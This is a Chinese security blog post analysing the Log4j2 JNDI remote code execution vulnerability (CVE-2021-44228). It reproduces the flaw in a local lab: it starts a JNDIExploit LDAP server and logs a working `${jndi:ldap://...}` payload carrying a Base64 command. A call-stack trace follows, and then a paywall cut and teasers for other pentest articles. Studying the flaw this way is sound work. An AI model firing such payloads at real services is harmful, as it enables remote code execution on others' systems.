代码审计-log4j2_rce分析

原创 于 2021-12-14 15:47:43 发布 · 1.1k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#java #开发语言 #后端

本文详细分析了Apache Log4j2远程代码执行漏洞,介绍了漏洞触发条件、复现步骤、调用栈分析、JNDI注入原理以及多种绕过方法。通过复现过程,揭示了Log4j2如何处理用户输入数据导致的安全问题,并提供了修复建议和临时缓解措施。此外,文章还讨论了补丁2.15.0-rc1的局限性和2.15.0-rc2的修复情况。

前言

2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。

2021年12月9日晚,各大公众号突然发布漏洞预警

Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。

由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞。漏洞利用无需特殊配置,经阿里云安全团队验证,Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响。

此次漏洞触发条件为只要外部用户输入的数据会被日志记录,即可造成远程代码执行。(CNVD-2021-95914、CVE-2021-44228)

影响版本:Apache Log4j 2.x <= 2.15.0-rc1

2.15.0-rc1 存在补丁绕过,但是很鸡肋

复现

老规矩,先复现,再分析

1、pom.xml

  • Jdk8u111

<!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-core -->
       <dependency>

           <groupId>org.apache.logging.log4j</groupId>

           <artifactId>log4j-core</artifactId>

           <version>2.14.1</version>

       </dependency>

       <!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-api -->

       <dependency>

           <groupId>org.apache.logging.log4j</groupId>

           <artifactId>log4j-api</artifactId>

           <version>2.14.1</version>

       </dependency>

2、启动JNDI注入Server

java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 127.0.0.1

3、漏洞代码

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class Test {

   private static final Logger logger = LogManager.getLogger(Test.class);

   public static void main(String[] args) {

       logger.error("${jndi:ldap://127.0.0.1:1389/Basic/Command/Base64/b3BlbiAtbmEgQ2FsY3VsYXRvcgo=}");

   }

}

4、效果

图片

图片

分析

1、调用栈

在利用过程中,因为我们明确知道要执行系统命令调用java.lang.Runtime#exec(java.lang.String[]),所以在exec方法处下断点,分析一下调用栈

图片

运行获取调用栈

图片

exec:485, Runtime (java.lang)
<init>:-1, ExploitgJlWqLWBF3

newInstance0:-1, NativeConstructorAccessorImpl (sun.reflect)

newInstance:62, NativeConstructorAccessorImpl (sun.reflect)

newInstance:45, DelegatingConstructorAccessorImpl (sun.reflect)

newInstance:423, Constructor (java.lang.reflect)

newInstance:442, Class (java.lang)

getObjectFactoryFromReference:163, NamingManager (javax.naming.spi)

getObjectInstance:189, DirectoryManager (javax.naming.spi)

c_lookup:1085, LdapCtx (com.sun.jndi.ldap)

p_lookup:542, ComponentContext (com.sun.jndi.toolkit.ctx)

lookup:177, PartialCompositeContext (com.sun.jndi.toolkit.ctx)

lookup:205, GenericURLContext (com.sun.jndi.toolkit.url)

lookup:94, ldapURLContext (com.sun.jndi.url.ldap)

lookup:417, InitialContext (javax.naming)

lookup:172, JndiManager (org.apache.logging.log4j.core.net)

lookup:56, JndiLookup (org.apache.logging.log4j.core.lookup)

lookup:221, Interpolator (org.apache.logging.log4j.core.lookup)

resolveVariable:1110, StrSubstitutor (org.apache.logging.log4j.core.lookup)

substitute:1033, StrSubstitutor (org.apache.logging.log4j.core.lookup)

substitute:912, StrSubstitutor (org.apache.logging.log4j.core.lookup)

replace:467, StrSubstitutor (org.apache.logging.log4j.core.lookup)

format:132, MessagePatternConverter (org.apache.logging.log4j.core.pattern)

format:38, PatternFormatter (org.apache.logging.log4j.core.pattern)

toSerializable:344, PatternLayout$PatternSerializer (org.apache.logging.log4j.core.layout)

toText:244, PatternLayout (org.apache.logging.log4j.core.layout)

encode:229, PatternLayout (org.apache.logging.log4j.core.layout)

encode:59, PatternLayout (org.apache.logging.log4j.core.layout)

directEncodeEvent:197, AbstractOutputStreamAppender (org.apache.logging.log4j.core.appender)

tryAppend:190, AbstractOutputStreamAppender (org.apache.logging.log4j.core.appen

最低0.47元/天 解锁文章
博客
“重保季”来临,网站及业务系统拒绝“裸奔”与“带病在线”!
08-09 3773
结合安全智脑对业务系统站点进行智能分析及被黑监测,ScanV(云监测)全面监测业务系统被篡改、被入侵、被挂反动标语等安全事件,快速定位风险并给出修复建议,拒绝网站及业务系统“带病在线”,第一时间发现并及时处置,从而有效降低业务系统被篡改的安全风险。从以上规定中不难看出,党政机关、政府事业单位的网站及业务系统,重点新闻网站,访问量超过100万人次的网站及业务系统,均可认定为关键信息基础设施。重保期间,开启站锁专项防护,在重要时期保障网站及业务系统100%安全,不被黑客攻破和篡改。...
博客
Linux入侵应急响应与排查
08-08 2390
在数据泄漏方面,mysql或者其他数据库的日志就非常重要了,首先查看mysql配置文件配置了哪几种日志记录,如bin log,query log慢查询日志,慢查询日志要在超过特定阀值,才会触发。查看被入侵后,在系统上执行过哪些命令,使用root用户登录系统,检查/home目录下的用户主目录的.bash_history文件。默认情况下,系统可以保存1000条的历史命令,并不记录命令执行的时间,根据需要进行安全加固。查看敏感目录,如/tmp目录下的文件,同时注意隐藏文件夹,以.为名的文件夹具有隐藏属性。...
博客
攻防演练实战派|专题合集之攻防演练全流程
07-07 4781
攻防演练实战派-不要“演”就是“干”专题已经连续更新五期了,如果您也跟随我们的时间安排进行了备战准备,相信您也已经可以“安心待战”了吧!我们就来整体做一下回顾,既温习一遍备战细节,又可以再次进行备战巩固,看有无疏漏。第一步 ► :网络空间资产盘点,绘制网络空间写实地图,参考《网络空间资产盘点十大“避坑”指南》;第二步 ►:利用创宇蜜罐设陷,重塑网络空间地形,参考《纵深主动防御“修炼”手册,重塑网络空间地形》;第三步 ►:实时流量检测,强化全流量优势,参考《实时威胁响应“三全”计划》;第四步 ►:临战演练磨合
博客
java 代码审计-语言基础篇
05-31 2504
文章作者:RaybyeJava是一门面向对象的计算机编程语言,吸收了C语言的各种优点,具有功能强大和简单易用两个特征。Java语言是最典型的静态面向对象编程语言的代表,具有简单性、面向对象、分布式、健壮性、安全性、平台独立与可移植性、多线程、动态性等特点。Java可用于编写桌面应用程序、Web应用程序、分布式系统,嵌入式系统应用程序和Android移动平台等 。但目前在企业中主流还是用于Web应用程序和Android移动平台,到目前为止Java在web应用模块框架发展的也是相当成熟,本篇文章简单的对
博客
渗透测试-网页接口加密暴破
05-30 2661
前言平时测试的时候,可能会遇到一些接口(如登陆接口)中的某些数据是加密的,如下图:一般的思路:通过逆向分析前端加密算法,拿到密钥,再写脚本模拟加密过程构造想要的数据[!note]上面的思路是常规的思路,如果代码存在混淆,则比较费时费力,甚至分析不出来因为加密都是在前端执行的,那么我们只需要模拟前端的操作即可此处抛开burp插件不谈解决办法通过js模拟操作即可1.定位输入框和按钮2.设置数据3.点击按钮分析代码,找到我们要输入的框然后定位到数据,
博客
GitHub云扫描器
05-25 2651
前言GitHub提供六小时的容器使用时长。可以利用其进行对外的端口扫描、目录扫描等操作。过程举例 https://github.com/inbug-team/InCloud运行于GitHub Actions 的仓库中自动化、自定义和执行软件开发工作流程,可以自己根据喜好定制功能,InCloud已经为您定制好了八种针对网段和域名的不同场景的信息收集与漏洞扫描流程。 PortScan-AllPort对单IP文件列表进行全端口扫描,输出可用Web服务标题。 PortScan.
博客
邮箱信息收集
05-24 4148
寻找目标开放的邮服端口和web邮箱入口通过扫描c段找到入口 拿到目标后,先要先从MX记录域名找到他的真实ip地址(某些目标可能是第三方邮件服务器,这种情况mx记录就没有参考价值了) 然后针对这个ip地址的c段进行扫描(25、109、110、143、465、995、993端口) 通过子域名的方式找到邮件入口Subdomainbrute、ksubdomain、Oneforall、Sublist3r、TeeMO、LangSrcCurise、Layer挖掘机等。通过搜索引擎爬取
博客
攻防演练实战派 | 网络空间资产盘点十大“避坑”指南
05-20 2364
国家级攻防演练是涉及国家级关键信息基础设施的大事,今年也是《关键信息基础设施安全保护条例》落地的第一年,所以攻防演练就更成为大家关注的焦点。创宇历次参与国家级攻防演练,展现不俗能力的同时,也收获了货真价实的“实战经验”。对于国家级攻防演练来说,时时刻刻都在备战中一点不为过,如果可以将“战时”的准备措施落实到日常的网络安全维护工作中去,当然是最理想的状态。资产盘点及梳理是攻防演练公认的第一步--只有夯实资产数据基础,才能基于其上构筑完善的网络空间“防御工事”。根据创宇作为众多企业“主防护”角色的实战经
博客
渗透测试- 信息收集
05-19 1923
ICP备案查询什么是ICP备案ICP备案是指网站在信息产业部提交网站信息进行官方认可。对国内各大小网站(包括企业及个人站点)的严格审查工作,对于没有合法备案的非经营性网站或没有取得ICP许可证的经营性网站, 根据网站性质,将予以罚款,严重的关闭网站,以此规范网络安全,打击一切利用网络资源进行不法活动的犯罪行为。也就是说,只要是盈利为目的的网站,都要进行ICP备案,否则会受到相应的处罚。国内使用国内服务器的网站,都必须要先办理ICP备案后才可以上线。有何作用通过查询目标企业的备案信息,可直
博客
信息收集之其他信息收集
05-17 2593
之前我们分享了域名收集的思路和方法、信息搜集中还有诸如C段资产、端口搜集、APP搜集、小程序、公众号收集。都是获取目标有效信息的方法。本次将从以下这些方法为大家讲解。段资产收集网络空间搜索引擎通过第三方搜索引擎搜索目标IP以及C段资产,来找到目标资产的IP地址使用如下关键词来找到目标资产的IP地址title:"知道创宇" +country:"CN" -subdivisions:"香港"根据网站的ico进行搜索iconhash:"3ae0b66d54edf1518e9111
博客
Weblogic上传shell路径
05-16 4591
前言有时候拿到weblogic能命令执行,但是目标不能出网,不方便直接上线,这时就需要上个webshell来辅助后续的渗透但是weblogic的web路径可能和常规的web系统不一样,不清楚的时候可能会一脸懵逼不知道上传到哪个目录下,以及如何访问,所以记录一下漏洞点不能出网路径路径1:写入bea_wls_internal目录上传目录绝对路径:[!NOTE]自己根据需要对照修改,命令执行的时候一般在目录sv0下E:\APP\Middleware\Oracle_Hom
博客
Java代码审计入门指南
05-13 5232
代码审计是一种以发现程序错误,安全漏洞和违反程序规范为目标的源代码分析。现在主流的审计方式一般都是工具扫描加人工审计的方式,因此在着手Java代码之前我们必须具备一定的Java编程能力,漏洞分析能力,以及局部代码调试能力。本篇文章主要包括Java代码审计的学习路线、要学习的Java基础和框架、Java代码审计的checklist,使用比较得心应手的工具以及人工做审计时的一些方法总结。根据 TIOBE 官方新发布了 8 月的编程语言榜单显示Java语言依旧还是稳居前三(排行榜如下),Java语言距今已有2
博客
信息收集之子域名收集
05-12 3002
上一次我们分享了主域名收集的思路和方法,但除了主域名外,子域名也是域名信息收集中的一个重要环节,在当今各种防护设备满天飞的情况下,想要拿下主域名越来越难,但我们可以使用迂回策略,从子域名下手,慢慢靠近主域名以达到shell的目的。子域名收集可以帮助我们发现目标对外开放的更多的资产,如果能找到一些被遗忘或目标不关注的子域名,将其作为突破点,可能达到事半功倍的效果。子域名收集的方式很多,但如何尽可能全的收集到所有的子域名却不是那么容易的事儿;本次将从手工和工具两种方式为大家进行讲解。手工操作证书
博客
渗透测试-DNS重绑定
05-10 3723
- 前言 -SSRF绕过的一种思路,就是利用DNS重绑定,它也被广泛用于绕过同源策略,本质就是欺骗客户端请求的IP地址。但是之前都是用如xip.io等别人搭建好的平台去利用,没有自己搞过,也没能彻底理解其中的原理- DNS重绑定 -浏览网页过程中,用户在地址栏中输入包含域名的网址,浏览器通过DNS服务器将域名解析为IP地址,然后向对应的IP地址请求资源,最后展现给用户。即域名 => 公共DNS服务器 => IP但是作为域名的所有者,可以随时设置解析IP,举例如下:用户第.
博客
渗透测试-XLST
05-09 2465
- XSLT简介 -XSL(可扩展样式表语言)是一种用于转换XML文档的语言,XSLT表示的就是XSL转换,转换后得到的一般都是不同的XML文档或其他类型文档,例如HTML文档、CSV文件以及明文文本文件等等。一般来说,应用程序或模板引擎在处理不同文件类型时需要使用XSLT来进行数据转换。很多企业级应用比较喜欢使用XSLT,比如说,多用户发票应用程序可以使用XSLT来允许客户自定义它们的发票,客户可以根据自己的需求来修改发票信息以及格式。其他常见应用:•报告功能•多种格式的数据导出功能;
博客
代码审计-Spring框架安全
05-06 2863
Spring框架安全作者:t4reega1.1. Spring简介Spring是目前Java应用最广泛的框架之一,是拥有着IoC和AOP的优秀机制的容器框架。而Spring MVC,则是Spring提供给Web开发的框架设计。1.2. Spring MVC实现逻辑Spring MVC中,所有的请求都有DispatcherServlet来统一处理、分发。然后借助HandlerMapping定位到处理请求的控制器(Controller)。Controller处理完成用户请求后,返回M
博客
渗透测试-内网信息收集
04-28 3578
1 收集本机信息1.1 手动收集信息查询网络配置信息ipconfig /all查询操作系统和版本信息systeminfo | findstr /B /C:"OS Name" /C:"OS Version"systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本"查询系统体系结构echo %PROCESSOR_ARCHITECTURE%查看安装的软件及版本、路径等wmic product get name,version利用PowerS
博客
渗透测试-PHP反序列化及绕过
04-26 4769
最简单的反序列化require_once('flag.php');highlight_file(__FILE__);classA{private$user='test';function__destruct(){...
博客
基于大数据看全球2021年网络攻击态势
04-24 4575
博客
渗透测试(1)- 信息收集来咯
04-20 4066
声明:1、本分享仅做学习交流,请自觉遵守法律法规!ICP备案查询什么是ICP备案ICP备案是指网站在信息产业部提交网站信息进行官方认可。对国内各大小网站(包括企业及个人站点)的严格审查工作,对于没有合法备案的非经营性网站或没有取得ICP许可证的经营性网站, 根据网站性质,将予以罚款,严重的关闭网站,以此规范网络安全,打击一切利用网络资源进行不法活动的犯罪行为。也就是说,只要是盈利为目的的网站,都要进行ICP备案,否则会受到相应的处罚。国内使用国内服务器的网站,都必须要先办理ICP备案
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值